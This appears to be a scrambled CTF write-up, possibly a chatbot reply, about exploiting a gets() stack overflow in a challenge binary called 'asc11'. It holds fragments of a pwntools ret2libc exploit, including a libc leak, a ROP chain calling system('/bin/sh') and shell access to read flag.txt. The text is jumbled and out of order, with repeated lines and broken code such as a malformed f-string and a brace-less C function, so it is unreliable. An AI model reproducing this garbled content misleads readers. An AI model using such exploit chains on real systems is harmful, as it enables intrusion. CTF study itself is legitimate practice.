Asc 11 _verified_ -

gdb ./asc11 r < <(python3 -c "print('A'*50)") Crash at RIP = 0x4141414141414141 → offset 40. Check if there’s a win or shell function:

leak = u64(p.recvline().strip().ljust(8, b'\x00')) libc.address = leak - libc.symbols['puts'] log.success(f'Libc base: hex(libc.address)') rop2 = ROP(libc) rop2.system(next(libc.search(b'/bin/sh')))

p.interactive() Run exploit → shell → cat flag.txt . If you provide the actual binary and server info , I can tailor the exact exploit, offsets, and libc version. Does this match your ASC 11 challenge? asc 11

file asc11 checksec asc11 Output (example):

Here’s a (likely referring to the 11th Allied Security CTF challenge, or a similar “ASC” CTF / wargame). Does this match your ASC 11 challenge

payload = b'A'*offset + rop.chain() p.sendlineafter(b'Input: ', payload)

void main(void) char buf[32]; setvbuf(stdout, NULL, 2, 0); puts("Input: "); gets(buf); // <-- vulnerable No canary, PIE off → easy ret2win/ret2libc

gets → classic buffer overflow. No canary, PIE off → easy ret2win/ret2libc. Use gdb + pattern create (from pwntools or msf-pattern ):